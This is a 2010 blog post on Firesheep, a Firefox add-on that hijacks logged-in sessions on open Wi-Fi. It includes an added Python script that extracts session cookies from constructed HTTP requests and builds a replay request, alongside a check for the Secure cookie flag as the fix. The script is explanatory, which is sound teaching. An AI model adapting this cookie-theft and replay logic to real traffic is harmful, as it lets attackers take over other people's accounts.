Tuesday, October 26, 2010

Firefox Add-on can Hijack Facebook, Twitter Logins

Secure logins are one of the most crucial issues in web security today. Eric Butler, a freelance web application developer, has shown just how exposed many current websites are. At the ToorCon security conference, Butler demonstrated a Firefox add-on dubbed Firesheep that lets anyone on an open Wi-Fi network scan the traffic and take over the logged-in sessions of Facebook, Twitter and several other services. It is a dangerous extension, and it points out a loophole in every website that encrypts only its login page.

Eric Butler created the Firesheep extension for Firefox with an altruistic aim: to point out the negligence of popular web services that follow weaker security measures. Firesheep exploits HTTP session hijacking over an open wireless network. Many sites encrypt only the login page; once the user has logged in, the site sets a session cookie in the user's browser and from then on serves its pages over plain HTTP. The browser sends that cookie with every one of those requests, unencrypted, so anyone on the same open network can read it off the air. The cookie does not carry the password, but it carries everything the site uses to recognise the logged-in account, so an attacker who presents the captured cookie is logged in as the victim without ever knowing the password.
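The following is an added example, not code from Firesheep or from the original article, that models the mechanism described above: plaintext HTTP requests are captured on the open network, a per-site handler says which cookies make up a login session, the matching cookies are pulled out and reused in a fresh request. It also shows the server-side fix the paragraph points at: a session cookie marked Secure is never sent over plain HTTP. The captured requests, the hosts (social.example, micro.example) and the cookie names are constructed for the demonstration and are assumptions, not the real sites' handlers.

```python
"""Toy model of HTTP session hijacking on an open Wi-Fi network.

Added example, not Firesheep's code. Hosts, cookie names and the captured
requests below are constructed for the demonstration.
"""
from dataclasses import dataclass

# Firesheep's model: a per-site handler names the cookies that together make
# up a login session. Assumed hosts and names, not the real sites' cookies.
HANDLERS = {
    "social.example": {"sid", "uid"},
    "micro.example": {"_session"},
}

# Constructed plaintext HTTP requests as they would appear on the air after
# the user logged in over HTTPS and then browsed the site over plain HTTP.
CAPTURED_REQUESTS = [
    "GET /home.php HTTP/1.1\r\n"
    "Host: social.example\r\n"
    "Cookie: sid=a1b2c3d4e5; uid=100234; locale=en_US\r\n"
    "\r\n",
    "GET /search?q=cats HTTP/1.1\r\n"
    "Host: images.example\r\n"
    "Cookie: prefs=dark\r\n"
    "\r\n",
    "POST /status/update HTTP/1.1\r\n"
    "Host: micro.example\r\n"
    "Cookie: _session=BAh7CEkiD3Nlc3Npb25faWQ; lang=en\r\n"
    "Content-Length: 0\r\n"
    "\r\n",
]


@dataclass(frozen=True)
class HijackedSession:
    host: str
    cookies: dict


def parse_request(raw):
    """Return (host, {cookie_name: value}) from a raw HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for pair in headers.get("cookie", "").split(";"):
        name, _, value = pair.strip().partition("=")
        if name:
            cookies[name] = value
    return headers.get("host", ""), cookies


def sniff_sessions(requests, handlers=HANDLERS):
    """Collect complete session cookie sets for hosts we have a handler for.

    Only a request carrying every cookie the handler lists counts; a lone
    preference or tracking cookie is not a usable login.
    """
    found = []
    for raw in requests:
        host, cookies = parse_request(raw)
        wanted = handlers.get(host)
        if wanted and wanted.issubset(cookies):
            found.append(HijackedSession(host, {k: cookies[k] for k in wanted}))
    return found


def replay_request(session, path="/"):
    """Build the request the attacker sends: same cookies, so same login."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in sorted(session.cookies.items()))
    return (f"GET {path} HTTP/1.1\r\nHost: {session.host}\r\n"
            f"Cookie: {cookie_header}\r\n\r\n")


# Server-side fix: a Secure cookie is never sent over plain HTTP, so there is
# nothing on the air to capture. The site must then serve the whole session
# over HTTPS, or the legitimate user's own browser will not stay logged in.
WEAK_SET_COOKIE = "Set-Cookie: sid=a1b2c3d4e5; Path=/; HttpOnly"
HARDENED_SET_COOKIE = "Set-Cookie: sid=a1b2c3d4e5; Path=/; Secure; HttpOnly"


def cookie_is_sniffable(set_cookie_header):
    """True if the cookie may travel over plain HTTP, i.e. lacks Secure."""
    attrs = {a.strip().lower() for a in set_cookie_header.split(";")[1:]}
    return "secure" not in attrs


if __name__ == "__main__":
    for s in sniff_sessions(CAPTURED_REQUESTS):
        print(f"hijackable session on {s.host}: {s.cookies}")
        print(replay_request(s, "/home.php"))
    print("weak cookie sniffable:", cookie_is_sniffable(WEAK_SET_COOKIE))
    print("hardened cookie sniffable:", cookie_is_sniffable(HARDENED_SET_COOKIE))
```

Run stand-alone, the script reports two hijackable sessions (the images.example request carries only a preference cookie and is ignored) and shows that the weak Set-Cookie is exposed while the hardened one is not. Real traffic would come from a packet capture rather than a list of strings; the parsing and matching is the same.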

Users of a bunch of popular sites can easily fall prey to Firesheep, which exists for Firefox on both Mac OS X and Windows. With Firesheep, Butler has raised the alarm not only about websites with weak security but also about unsecured open Wi-Fi networks.

Firesheep snoops on open Wi-Fi networks, so it is your responsibility to secure your own Wi-Fi network with encryption and a password. Butler pointed out that the vulnerability has always existed and that sophisticated attackers have long exploited it; what Firesheep changes is that an average Internet user can now see the importance of properly secured websites, which should compel several of them to strengthen their security.

Since the Firefox add-on is free, Firesheep has already been downloaded over 100,000 times. Butler noted that tools for HTTP session hijacking have always been available on the web.

Of course, it is dangerous to use this plugin and snoop around open Wi-Fi networks in public places like coffee shops or malls. For the time being, on an open network, resist signing into websites that do not offer HTTPS (SSL) for the whole session rather than just the login page. Butler promised to post a solution that lets users protect themselves against these kinds of attacks.